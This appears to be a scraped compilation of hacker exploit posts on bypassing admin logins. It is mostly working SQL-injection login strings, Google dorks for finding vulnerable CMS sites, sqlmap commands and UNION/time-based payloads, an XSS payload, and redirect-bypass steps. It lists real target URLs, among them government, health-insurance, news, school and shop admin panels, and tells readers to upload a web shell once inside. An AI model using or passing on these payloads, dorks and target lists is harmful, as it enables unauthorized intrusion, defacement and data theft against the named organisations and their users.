Dork~Bypass_Admin

Uploaded by

aronline2005

+++++++++++++[ Fri Nov 24 16:59:05 WIB 2023 ]++++++++++++++++

|[+] Demo:
(username)= '=' 'or
Demo site: www.dec.gov.sy/immediate-panel.php
|[+] Exploit Author: s49_hack
|[+] Exploit Title: Syrian Ministry of Electricity Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: www.dec.gov.sy/immediate-panel.php
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: nabdalneelain.org/admin/login
or : username: admin
password: admin
|[+] Exploit Author: s49_hack
|[+] Exploit Title: Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: nabdalneelain.org/admin/login
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: http://196.219.219.187/HIO/admin/Login.aspx
Demo site: http://196.219.219.187/HIOwoman/admin/Login.aspx
or : username: admin
password: 123
|[+] Exploit Author: s49_hack
|[+] Exploit Title: Egyptian Health Insurance Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: http://196.219.219.187/HIO/admin/Login.aspx
|[+] Vendor site: http://196.219.219.187/HIOwoman/admin/Login.aspx
|[+] instagram: @s49_hack

user_pass : 'or''='
|[+] Demo:
Demo site: http://www.alblaad.com/cp/
OR :
password: admin
username: admin
|[+] Exploit Author: s49_hack
|[+] Exploit Title: Kuwaiti Al-Bilad Newspaper Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: http://www.alblaad.com/cp/
|[+] instagram: @s49_hack

user_pass : 'or''='
|[+] Demo:
Demo site: https://www.saudisalons.com/admin/index.php
[+] Exploit Title: saudisalons Admin Login Bypass
or :
username: admin
|[+] Exploit Author: s49_hack
|[+] Tested on: Kali Linux
|[+] Vendor site: https://www.saudisalons.com/admin/index.php
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: http://www.alrasedkw.com/cp/
or :
password: admin
username: admin
|[+] Exploit Title: Kuwaiti Al-Rased Newspaper ADMIN LOGIN BYPASS
|[+] Tested on: Kali Linux
|[+] Vendor site: http://www.alrasedkw.com/cp/
|[+] instagram: @s49_hack

user_pass 'or''='
|[+] Demo:
Demo site: http://system.resaladk.org
or : username: admin
|[+] Exploit Author: s49_hack
|[+] Exploit Title: resalaadk Admin Login Bypass
|[+] Tested on: Kali Linux
|[+] Vendor site: http://system.resaladk.org
|[+] instagram: @s49_hack

# Date: 07/30/2017
# Exploit Author: Gh05t666include
# Exploit Title: Pro CMS Pro Designz Bypass Admin No Redirect
# Google Dork: Powered By : Pro Designz
# Software Link: https://www.prodesignz.net/portfolio/pro-cms/
# Tested on: Windows / Linux / MacOS
# Vendor Homepage: https://www.prodesignz.net/
1. Go to Admin Page in http://(Domain name)/admin/login.php
2. Install Bypass No Redirect Plugins in Mozilla Firefox
2017.07.30
3. Submit Victim Domain http://(Domain name)/admin/login.php in Bypass No Redirect
4. And go to http://(Domain name)/admin/
CVE: N/A
CWE: N/A
Demo :
Dork: Powered By : Pro Designz
Download and Install Plugin here :
https://addons.mozilla.org/en-US/firefox/addon/noredirect/
Home Page
Local: No
Pro CMS Pro Designz Bypass Admin No Redirect
Remote: Yes
Risk: Medium
id Gh05t666include (ID) id

# Date: 23/07/2020
# Dork:inurl:/backoffice/login.php
# Exploit Author:H9xHacker
# Exploit Title:OBE - Bypass admin with Noredirect
# Tested on:Linux
#Demo:
------------------------
Reverse check bing.com
ip:72.55.140.20 backoffice/login.php OR ip:72.55.140.20 .php?id= (There are 95
domains hosted on this server).
open http://site.com/backoffice/login.php
then open http://site.com/backoffice/index.php
use NoRedirect tool & add http://site.com/backoffice/login.php

[Bypass Admin panel]


[SQL injection]
[XSS Vulnerability]
Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND
'rCId'=
Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd
Payload: catid=15' UNION ALL SELECT
CONCAT(0x716b767171,0x6c746c51566743754d
Title: AND boolean-based blind - WHERE or HAVING clause
Title: Generic UNION query (NULL) - 19 columns
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Type: UNION query
Type: boolean-based blind
Type: time-based blind

###################################################################################
########################################
========================================================================|
[+] - UNION query
[+] Method ( Sql injection ) Ictus Security Team of Iran
[+] Method :"><script>alert('Aryan Chehreghani |
Ictus_TM')</script><"
[+] Testing Method:
[+] Type Code IN search Value / some Value
[+] http://ncrlife.in/latestnews.php?catid=25[SQL]
[+] parameter : id = latestnews.php?catid=25
[=] T.me/Clvsornapv
###################################################################################
########################################
'rCId
+ Auxiliary software : http://sqlmap.org
+ Date: 2020-06-05
+ Dork 1 : intext:Design by Dassinfotech.com
+ Dork 2 : inurl:detailsnews.php?id=
+ Dork 3 : intext:Design by Dassinfotech.com inurl:detailsnews.php?id=
+ Dork 4 : inurl:php?id= intext:Design By Dassinfotech.com
+ Dork CVE: CVE-2019-13409
+ Dork CWE : CWE-89
+ Exploit Author : Aryan Chehreghani | Ictus_TM
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel &&
XSS Vulnerability By Aryan Chehreghani
+ Tested on: win,linux,mac
+ Vendor Homepage: https://www.dassinfotech.com
+ Version: All Version
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NUL
========================================================================|
Demo:
Exploit ==>
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL-- -
[+] Payload U / P : '=''or' / '=''or'
[+]Login Pages : victim.com/matri/login.php victim.com/india/login.php
[+]Using Sqlmap Example : sqlmap -u http://target.com/latestnews.php?catid=25 --dbs
__________SQLMAP__________result :
arameter: catid (GET)
latestnews.php?catid=-23%27%20union%20select
%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fR
om%20admin--%20-
||||||||||||||||||||||| Parameter: sec (GET) || |||||||||||||||||||||||

2. ' or 1=1 limit 1 -- -+


2. inurl:zoom-admin intitle:Login : Admin
Admin page : /zoom-admin/index.php
Google search : "Powered By Zoom Web Media" | inurl:zoom-admin
intitle:Login : Admin
Usage Username & Password : 1. '=''OR'
[+] Category : webapps
[+] DORKS : 1. "Powered By Zoom Web Media"
[+] Date : 2020/6/1
[+] Exploit Author : nginxDEX
[+] Tested on : Windows
[+] Title : Zoom Web Media - Admin Login bypass
[+][+][+] TUTORIAL [+][+][+][+]

# Admin Page :
# Date : 24 / 05 / 2020
# Demo :
# Dork :
# Exploit Author : Xmall75
# Exploit Title : Dassinfotech CMS SQL Injection Bypass Admin Vulnerability
# Payload U / P : '=''or' / '=''or'
# SQL Injection :
# Step :
# Tested on : Windows 7
# Vendor Homepage : www.dassinfotech.com
- Crot.
- Dorking on the Google.
- Fill the username and password using the payload that i gave.
- Open the admin page.
- Upload your shell.
intext:Design by Dassinfotech.com
inurl:detailsnews.php?id=

# Admin Vuln :
# Author [ Discovered By ] : EbRaHiM-VaKeR
# Category : WebApps
# Date : 2020/04/10
# Discovered By EbRaHiM-VaKeR from IranonymousTm
# Example Vuln :
# Exploit Risk : Medium
# Exploit Title : OnlineShop Cms Sql & Admin Bypass
# Member: 4min.x / Kaveh Turk / Mr JxRoot / J3N
# Site: http://iranonymous.ir
# Team : Iranonymous Team
# Tested On : Windows and Linux
# Vendor Homepage : https://github.com/0dayherman/OnlineShop/
###################################################################
#Google Dork: N/A
[+] http://localhost:8080/OnlineShop/login.php
[+] http://localhost:8080/OnlineShop/view.php?id=3
user & Password: '=''or'

# Blogspot : https://lightcyberindo.blogspot.com
# Contact
# Demo
# Dork : intext:Designed and Developed by Vibhuti Infotech
# Exploit Author : ./MiSetya
# Exploit Title : Designed and Developed by Vibhuti Infotech - Bypass Admin
# Greetz
# Risk : Low
# Website : http://lightcyberindonesia.dx.am
- Email : jimmisetiawan54@gmail.com
- Light Cyber Indonesia
- Telegram : t.me/misetya
- http://www.gayatrinursing.org/admin

# Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
# Author [ Discovered By ] : KingSkrupellos
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Category : WebApps
# Date : 13/04/2020
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
# Exploit Risk : Medium
# Exploit Title : Pinnacle India Solution Admin Authentication Bypass
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Impact :
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# Pastebin : pastebin.com/u/KingSkrupellos
# Team : Cyberizm Digital Security Army
# Tested On : Windows and Linux
# Vendor Homepage : pinnacleindia.com
# Vulnerability Type : CWE-287 [ Improper Authentication ]
####################################################################
***********
******************************************************************************
/admin/admin-login.php
/admin/album.php
/admin/call-request.php
/admin/course-details.php
/admin/home-slider.php
/admin/noticeboard.php
/admin/recent-video.php
/admin/recentevent.php
/admin/selection.php
/admin/testimonial.php
/admin/upload1.php
/admin/upload2.php
/admin/web-query.php
Admin Panel Login Path :
Admin Password : '=''or'
Admin Username : '=''or'
Reverse IP results (148.66.138.161)
Reverse IP results (107.180.3.164)
There are 248 domains hosted on this server.
There are 482 domains hosted on this server.

CWE-287 [ Improper Authentication ]
Authentication is any process by which a system verifies the identity of a user who
wishes to access it. When an actor claims to have a given identity, the software does
not prove or insufficiently proves that the claim is correct. Improper authentication
occurs when an application improperly verifies the identity of a user. A software
incorrectly validates user's login information and as a result, an attacker can gain
certain privileges within the application or disclose sensitive information that
allows them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.

CAPEC-115 [ Authentication Bypass ]
CAPEC-115: Authentication Bypass
An attacker gains access to application, service, or device with the privileges of an
authorized or privileged user by evading or circumventing an authentication mechanism.
The attacker is therefore able to access protected data without authentication ever
having taken place. This refers to an attacker gaining access equivalent to an
authenticated user without ever going through an authentication procedure. This is
usually the result of the attacker using an unexpected access procedure that does not
go through the proper checkpoints where authentication should occur. For example, a
web site might assume that all users will click through a given link in order to get
to secure material and simply authenticate everyone that clicks the link. However, an
attacker might be able to reach secured web content by explicitly entering the path to
the content rather than clicking through the authentication link, thereby avoiding the
check entirely. This attack pattern differs from other authentication attacks in that
attacks of this pattern avoid authentication entirely, rather than faking
authentication by exploiting flaws or by stealing credentials from legitimate users.

Admin page: Site.ir/log/vorood.php


Password: ' or 1#
Username: ' or 1#

# CVE: N/A
# Category : webapps
# Date: 2020-04-12
# Exploit Author: kodak
# Exploit Title: Vorood Admin Login Bypass
# Google Dork: inurl:vorood.php
# Tested on: Kali Linux / Windows 7
-------------------------------------------------
Open target
Search the dork in Google
[+] DEMO
http://www.vamam.ir/log/vorood.php

# Author [ Discovered By ] : EbRaHiM-VaKeR


# Category : WebApps
# Date : 2020/04/07
# Discovered By EbRaHiM-VaKeR from IranonymousTm
# Example Vulnerable Sites :
# Exploit Risk : High
# Exploit Title : 3solutions.cz Admin Page Bypass
# Site: http://iranonymous.ir
# Team : Iranonymous Team
# Tested On : Windows and Linux
# Vendor Homepage : http://3solutions.cz/
###################################################################
#Google Dork:
(Use Your brain :v)
*************************
4min.x / Kaveh Turk / Mr JxRoot / J3N
[+] http://www.svetgrilu.cz/admin/index.php
[+] http://www.topkraft.cz/admin/index.php
[+] https://www.ragtime.cz/admin/index.php
intext:Email: info@3solutions.cz , Hotline: +420 739 950 035

http://alltimecargo.com/login.php
user_pass::> 'or''='
|[+] # und3rgr0und Red Hacker #
|[+] Tested on: Windows 10
|[+] Demo:
|[+] Exploit Author: Bl4ck M4n
|[+] Exploit Title: Design by Afireweb Admin Login Bypass
|[+] Google Dork: N/A
|[+] Vendor site: http://alltimecargo.com/

AUTHOR: Mustafa Öztaş


Admin Panel Bypass Exploit
Demo site: http://mariasantisima.edu.ve/sirea/login.php
Dork:intext:2020 © ClasesIT - SIREA. Derechos reservados
Example:
Login Succesfull!
OR
TWİTTER:twitter.com/oztas_py
http://mariasantisima.edu.ve/sirea/login.php
password: '=''or'
tested by linux
url:site/sirea/includes/conectar/login.php
url:site/sirea/login.php
username: '=''or'

# Date: 2020-03-24
# Demo:
# Exploit :
# Exploit Author: Nobody
# Exploit Title: Dinamik İşler Tasarım ve Tanıtım Hizmetleri - Bypass Admin Panel
with Noredirect
# Google Dork : /sayfa/form/01/iletisimformu
# Tested on: Windows / Mozilla Firefox
# Use Noredirect and Change it /admin/login.php to /admin/index.php
# Vendor Homepage : https://www.dinamikisler.com/
#####################################################

# Discovered By A-Searcher
# takhrib@gmx.com
# Date: 2020-03-22
# Exploit Author: A-Searcher
# Exploit Title: BALAS INDUSTRIES Admin Login Bypass
# Google Dork : N/A
# Panel:
# Tested on: Windows / Mozilla Firefox
# Username & Password : '=' 'or'
# Vendor Homepage : N/A
#####################################################
#####################################################
#http://www.balasfurniture.com/admin/index.php

# Date: 2020-03-22
# Demo:
# Exploit Author: HUNT3R L!ON
# Exploit Title: Worldviewer Admin Panel Bypass
# Google Dork : intext:"Created by: Worldviewer.in. "
# Pass : '=' 'OR'
# Team: BD Grey Hat Hackers
# Tested on: Windows / Mozilla Firefox
# User : '=' 'OR'
# Vendor Homepage : Worldviewer.in
# https://alappuzha.com/admin/
# https://athirappally.com/admin/
# https://vagamon.com/admin/
# https://www.kumarakom.com/admin/
#####################################################
#Admin Panel : http://www.website/admin

# Author : ./Mi1337
# Blogspot : https://lightcyberindo.blogspot.com
# Contact Me
# Demo
# Dork : intext:Created By SR Edu
# Exploit Name : Created by SR Edu - Bypass Admin
# Greetz
# PoC
# Risk : Medium
# Team : Light Cyber Indonesia
- Acces your shell at localhost:8080/admin/gallery/yourshell.php
- Add /admin behind the website, will automatically be redirected to the login page
(ex : localhost/admin)
- Dorking on google using dork above
- Email : jimmisetiawan54@gmail.com
- My Team : Light Cyber Indonesia (From Indonesia to World Team)
- Telegram : t.me/misetya
- Upload your shell at localhost:8080/admin/add-gallery.php
- User : '="or' / Pass : '="or'
- http://carmelschoolbdk.com/admin/
